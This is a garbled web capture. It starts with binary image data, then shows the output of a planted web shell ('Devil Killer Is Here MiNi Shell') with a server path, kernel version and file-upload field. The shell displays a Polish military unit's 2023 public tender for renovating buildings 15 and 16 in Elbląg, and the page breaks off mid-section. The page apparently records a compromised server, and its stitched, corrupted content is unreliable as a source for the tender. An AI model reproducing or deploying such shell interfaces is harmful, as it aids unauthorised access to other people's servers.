JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230307/0012426301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> REMONT BUDYNKÓW NR 15 I 16 W KNW PRZY UL. DĄBROWSKIEGO W ELBLĄGU – II ETAP. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> REMONT BUDYNKÓW NR 15 I 16 W KNW PRZY UL. DĄBROWSKIEGO W ELBLĄGU – II ETAP. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c6f92ee6-b8f9-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00124263</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich<br/>użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na:<br/> „REMONT BUDYNKÓW NR 15 I 16 W KNW PRZY UL. DĄBROWSKIEGO W ELBLĄGU – II ETAP.” nr postępowania 11/SZP/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest :Remont budynków Nr 15 i 16 w KNW przy ul. Dąbrowskiego w Elblągu – II ETAP. <br/>Budowa: Budynek Nr 15 i nr 16 na terenie Składu Elbląg – 2 RBLog<br/> w KNW przy ul. Dąbrowskiego 35 w Elblągu<br/><br/>Zakres robót obejmuje:<br/>Budynek nr 15<br/>1.Podłogi i posadzki<br/>- rozbiórka posadzki betonowej ,<br/>-zabezpieczenie bram plandeką na czas robót,<br/>- nacinanie podłoży betonowych ,<br/>- mechaniczna rozbiórka elementów betonowych,<br/>- wykonanie posadzki betonowej (beton B-30),<br/>- wywóz i utylizacja odpadów.<br/> 2.Instalowanie bram<br/>W budynku należy zamontować 7 sztuk bram z drzwiami serwisowymi i 11 sztuk bram bez drzwi serwisowych. Bramy ze względu na zabytkowy charakter obiektu oraz istniejących 9 sztuk nowych bram w tym samym budynku, muszą być wizualnie i wzorniczo identyczne ( kolor, kształt uszczelek okiennych, podział i kształt obróbek blacharskich, połączenia mur ościeżnica).<br/> Bramy o następujących parametrach:<br/>- garażowa brama harmonijkowa powinna działać przy pomocy wózków na systemie torów co umożliwia ręczną obsługę bramy,<br/>- standardowo brama powinna być wyposażona we wszystkie akcesoria niezbędne do obsługi ręcznej z dźwignią awaryjną, która powinna być ustawiona w pozycji zablokowanej,<br/>- płaszcz bramy wykonany z dwuściennych segmentów o gr.55 mm z blachy stalowej ocynkowanej,<br/>- rama obwodowa skrzydła wykonana z profilu kształtowego typu jaskółczy ogon z blachy gr. 2 mm, od dołu profil aluminiowy ze szczotką,<br/>- segmenty wypełnione są bez-freonową pianką poliuretanową o gęstości większej niż 40 kg/m3, pokryte gładką lakierowaną blachą o grubości 0,8 mm,<br/>- prowadnica górna wykonana z galwanizowanej stali o grubości 2 mm,<br/>- prowadnice boczne wykonane z aluminium, po zamontowaniu zapewniają dobrą stabilność i umocowanie bramy,<br/>- zawiasy wykonane z aluminium wyposażone w sworzeń i podwójne łożysko zapewniającą dobrą ruchomość skrzydeł,<br/>- górne wózki mają składać się z trzech nylonowych kółek zapewniających cichą pracę bramy,<br/>- do zamykania bramy zastosować rygle mocowane wewnątrz bramy wyposażone w pręty do zamykania z góry i z dołu. Pręty powinny mieć wzmocnione końce,<br/>- zamknięcie wewnętrzne bramy jest zapewnione przez blokadę PVC zamontowaną w podłożu,<br/>- klamki zamykające rygle muszą znajdować się na wysokości dostępnej dla niskiej osoby,<br/>- brama powinna posiadać gumowe uszczelki o grubości 50 mm, zamontowane pomiędzy skrzydłami i wykonane z naturalnego EPDM,<br/>- brama wyposażona w naświetla o wymiarach szer. 500 i wysokość 600 mm zamontowane w każdym skrzydle w górnej części bramy, szkło bezpieczne akrylowe, nieprzezierne ale przepuszczające światło.<br/>- skrzydła dwa skrajne w każdej bramie od zewnątrz maja być wyposażone w kratki nawiewne żaluzjowe stale o wymiarach szer. 600 mm i wys. 300 mm w kolorze czarnym, a od wewnątrz kratka nawiewna wyposażona w regulację umożlwiającą jej zamknięcie.<br/>- jedno skrzydło bramy dwusegmentowe drugie skrzydło jednosegmentowe,<br/>- w skrzydle jednosegmentowym należy wykonać drzwi serwisowe 900x2000 mm wyposażone w niezależny zamek, ( dotyczy 7 sztuk bram)<br/>- skrzydła bram powinny być wyposażone w blokadę w postaci zasuwy aluminiowej kotwiącej się w zamontowanej w płycie betonowej parkingu tulei, która uniemożliwia niekontrolowane zamykanie się skrzydeł po otwarciu bram,<br/>- bramy wyposażyć w dodatkowe uchwyty ze stali nierdzewnej do zamykania kłódki pełniących jednocześnie rolę plombownicy.<br/>- bramy pomalowane w kolorze RAL 9006,<br/>-Przy wymianie bram należy wykonać wymianę części zewnętrznej i wewnętrznej betonowego wjazdu oraz osadzić stalowy kątownik GW wzmacniający próg. Istniejącą starą stalową ościeżnicę wmurowaną w ościeże należy naprawić, oczyścić i pomalować antykorozyjnie.<br/>-Na placu manewrowym przy bramach znajdują się betonowe oporniki, które należy usunąć. W miejsce tych oporników zamontować oporniki z rur stalowych grubościennych fi 200 długości 150 cm. Opornik ma być zagłębiony 50 cm w stopę betonową posadowioną na głębokości 1m. poniżej poziomu gruntu (część wystająca ma mieć długość 100cm) Słupki mają być pomalowane w pasy żółto-czarne.<br/>-W przypadku stwierdzenia podczas wykonywania robót uszkodzeń nadproży bramowych i węgarków należy je naprawić.<br/>3.Wymiana stolarki okiennej<br/>-demontaż istniejącej stolarki okiennej w pomieszczeniach magazynowo biurowych i na klatkach schodowych,<br/>-montaż nowej stolarki okiennej PCV w ilości 28 szt. o wymiarach :<br/>a) 26 sztuk – szer.132 cm x wys.152 cm – okna białe PCV dwuskrzydłowe z symetrycznym podziałem pionowym, jedno skrzydło rozwierne, drugie skrzydło rozwierno-uchylne, przenikalność cieplna nie może być większa niż 0,9 W/(m²·K )<br/>b) 2 sztuki – szer.132 cm x wys.330 cm - okna białe PCV , przenikalność cieplna nie może być większa niż 0,9 W/(m²·K ), podział okna zgodnie z poniższym szkicem . Górna połowa okna stała, w dolnej części jedno skrzydło rozwierno-uchylne , drugie rozwierne . Szprosy stałe z ramiaków ( nie naklejane) .Klamki zamykane na kluczyk. Schematy okien znajdują się na <br/>- montaż parapetów zewnętrznych stalowych ocynkowanych o wymiarach 150 cm x 30 cm – ilość 28 szt.<br/>- montaż parapetów wewnętrznych PCV systemowych o wymiarach 150 mm x 30 cm – ilość 28 szt.<br/>- zwężenie wewnętrznego światła otworów okiennych poprzez domurowanie i otynkowanie węgarków ( zamiana okien skrzynkowych na okna zespolone)<br/>- szpachlowanie naprawcze po wymianie okien<br/>- malowanie ścian okiennych i węgarków farba emulsyjna w kolorze białym o zwiększonej odporności na ścieranie<br/>Przed rozpoczęciem robót należy zabezpieczyć folią posadzki w magazynach i klatkach schodowych , zabezpieczyć regały i meble folią. W razie konieczności należy przestawić meble kolidujące z pracami budowlanymi. Po zakończonych robotach umyć posadzki i inne elementy.<br/>4.Remont instalacji elektrycznej<br/>- wymiana oświetlenia i instalacji elektrycznej natynkowej w 10 pomieszczeniach garażowych,<br/>- Lampy LED wiszące 2x 18 W z wymiennym źródłem światła, pyłoszczelne IP 55 , długość 120 cm - ilość 81 sztuk lamp,<br/>-wymiana wyłączników natynkowych w ilości 10 sztuk,<br/>- wymiana instalacji zasilającej gniazda 230 V ( natynkowa) – ilość punktów 40 szt.<br/>- wymiana instalacji trójfazowej 6 punktów,<br/>- wymiana 2 sztuk rozdzielnic elektrycznych 48 pól ( IP 67). Jedna rozdzielnia wyposażona w : wyłącznik główny 60 A, wyłącznik nadmiarowo-prądowy 32 A – 3 sztuki, wyłącznik nadmiarowo-prądowy B10 – 5 sztuk, wyłącznik nadmiarowo-prądowy B16 – 5 sztuk, wyłącznik nadmiarowo-prądowy zespolony trójfazowy B20 – 3 sztuki,<br/>- wymiana zwodów piorunochronowych na przylegające do ściany w rurkach PCV.<br/>Budynek Nr 16<br/>1.Podłogi i posadzki<br/>- rozbiórka części betonowej posadzki wjazdu do garażu – 2 wjazdy,<br/>- zabezpieczenie bram plandeką na czas robót,<br/>-nacinanie podłoży betonowych ,<br/>- mechaniczna rozbiórka elementów betonowych,<br/>- wykonanie posadzki betonowej (beton B-30),<br/>- montaż stalowego progu z kątownika GW<br/>- wywóz i utylizacja odpadów.<br/>2.Wymiana stolarki okiennej<br/>- demontaż istniejącej stolarki okiennej w pomieszczeniach socjalnych<br/>-montaż nowej stolarki okiennej PCV w ilosci 5 szt. o wymiarach :<br/>a) 1 sztuk – szer.150 cm x wys.165 cm – okna białe PCV dwuskrzydłowe z symetrycznym podziałem pionowym, jedno skrzydło rozwierne , drugie skrzydło rozwierno-uchylne , przenikalność cieplna nie może być większa niż 0,9 W/(m²·K )<br/>b) 1 sztuki – szer.108 cm x wys.158 cm - okna białe PCV , dwuskrzydłowe z symetrycznym podziałem pionowym, jedno skrzydło rozwierne , drugie skrzydło rozwierno-uchylne , przenikalność cieplna nie może być większa niż 0,9 W/(m²·K )<br/>c)1 sztuki – szer.120 cm x wys.148 cm - okna białe PCV , dwuskrzydłowe z symetrycznym podziałem pionowym, jedno skrzydło rozwierne , drugie skrzydło rozwierno-uchylne , przenikalność cieplna nie może być większa niż 0,9 W/(m²·K )<br/>d)2 sztuki – szer.150 cm x wys.164 cm - okna białe PCV , dwuskrzydłowe z symetrycznym podziałem pionowym, jedno skrzydło rozwierne , drugie skrzydło rozwierno-uchylne , przenikalność cieplna nie może być większa niż 0,9 W/(m²·K )<br/>-montaż parapetów zewnętrznych stalowych ocynkowanych<br/>- montaż parapetów wewnętrznych PCV systemowych<br/>-zwężenie wewnętrznego światła otworów okiennych poprzez domurowanie i otynkowanie węgarków ( zamiana okien skrzynkowych na okna zespolone)<br/>-przygotowanie ścian okiennych do malowania<br/>-szpachlowanie naprawcze po wymianie okien<br/>- malowanie ścian okiennych i węgarków farbą emulsyjna w kolorze białym o zwiększonej odporności na ścieranie<br/>-wywóz i utylizacja gruzu i odpadów z placu budowy,<br/>Prace przy realizacji przedmiotowego zadania powinny być oparte<br/>o najnowsze technologie budowlane i techniczne spełniające wymagania zawarte w Polskich Normach, zapewniające bezpieczne i zgodne z przepisami przechowywanie środków materiałowych oraz komfort pracy użytkownika.<br/>Zastosowane rozwiązania techniczne i urządzenia muszą spełniać wymagania w zakresie bezpieczeństwa przy obsłudze pomieszczeń magazynowych, ewakuacji sprzętu i mienia oraz ochrony przeciwpożarowej.<br/>Niezależnie od podanego zakresu prac, należy przy realizacji przedmiotu zamówienia uwzględnić wymagania zawarte w obowiązujących przepisach<br/>i normach dla tego typu prac.<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 i 4 do SWZ.<br/>Minimalny okres gwarancji i rękojmi wynosi 36 miesięcy, natomiast maksymalny punktowany okres gwarancji i rękojmi wynosi 60 miesięcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp, w zakresie do 50% wartości zamówienia podstawowego. Polegać one będą <br/>na powtórzeniu podobnych robót budowlanych z zakresu objętego przedmiotem zamówienia w zakresie do 50% wartości zamówienia podstawowego. Będą udzielone na warunkach ustalonych w zamówieniu podstawowym (warunkach umowy) z uwzględnieniem dodatkowych negocjacji prowadzonych w zakresie realizacji tego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty - 60%<br/>2) Okres udzielonej gwarancji i rękojmi - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/><br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium: „Cena brutto oferty”.<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium: „Okres udzielonej gwarancji i rękojmi”.<br/><br/>3.	W kryterium „Cena brutto oferty” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/><br/>4.	W kryterium „Okres udzielonej gwarancji i rękojmi” zostanie zastosowany wzór:<br/><br/> okres udzielonej gwarancji i rękojmi badanej oferty<br/>Liczba punktów= ------------------------------------------------------- x 100pkt x 40%<br/> najdłuższy okres udzielonej gwarancji i rękojmi<br/><br/>UWAGA:<br/>a)	Minimalny wymagany termin gwarancji i rękojmi wynosi 36 miesięcy, natomiast maksymalny, punktowany termin gwarancji i rękojmi wynosi 60 miesięcy.<br/>b)	W przypadku niewpisania przez Wykonawcę w formularzu ofertowym żadnego terminu gwarancji i rękojmi, Zamawiający uzna, że Wykonawca zaoferował termin 36-miesięczny.<br/>c)	W przypadku wpisania terminu gwarancji i rękojmi krótszego niż 36 miesięcy, oferta Wykonawcy zostanie odrzucona, jako niezgodna z SWZ.<br/>d)	W przypadku wpisania terminu gwarancji i rękojmi dłuższego niż 60 miesięcy, Zamawiający przyzna punkty jak dla terminu 60-miesięcznego, natomiast do umowy wpisze, jako obowiązujący termin gwarancji i rękojmi faktycznie zaoferowany przez Wykonawcę.<br/><br/>5.	Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 